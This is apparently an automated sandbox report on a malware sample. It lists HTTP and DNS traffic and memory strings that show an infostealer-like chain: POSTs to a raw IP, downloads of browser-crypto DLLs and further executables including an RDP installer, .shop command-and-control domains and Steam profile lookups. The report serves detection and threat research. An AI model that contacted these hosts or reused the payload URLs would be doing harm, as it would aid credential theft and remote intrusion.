Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJDAAEGIDHDGCAAFCBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFBFBAAKECFIEBFIECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEBGDAFHJEBGDGIJDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 6173Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5de72d9ebd_rdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3161Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.211.162

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_00406963

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f5de72d9ebd_rdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: wallkedsleeoi.shop
Source: global traffic	DNS traffic detected: DNS query: gutterydhowi.shop
Source: global traffic	DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic	DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic	DNS traffic detected: DNS query: vozmeatillu.shop
Source: global traffic	DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic	DNS traffic detected: DNS query: fragnantbui.shop
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic	DNS traffic detected: DNS query: stogeneratmns.shop
Source: global traffic	DNS traffic detected: DNS query: reinforcenh.shop
Source: global traffic	DNS traffic detected: DNS query: ballotnwu.site
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: hansgborn.eu

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
Source: RegAsm.exe, 00000003.00000002.2843926018.000000000150A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2843926018.0000000001626000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exe
Source: RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;
Source: RegAsm.exe, 00000003.00000002.2843926018.000000000150A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2843926018.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2843926018.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe
Source: RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220804http://147.45.44.104/prog/66f5db9e
Source: RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;
Source: RegAsm.exe, 00000003.00000002.2843926018.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exes
Source: RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66f5de72d9ebd_rdp.exe
Source: file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003027000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003008000.00000004.00000800.00020000.00000000.sdmp, BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003027000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003008000.00000004.00000800.00020000.00000000.sdmp, BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003027000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.orgd
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, nss3.dll.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.BKFIDHJKFCAF
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.JKFCAF
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001626000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgCAF
Source: file.exe, 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoHJKFCAF
Source: file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, nss3.dll.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003027000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hansgborn.eu
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000003027000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hansgborn.eud
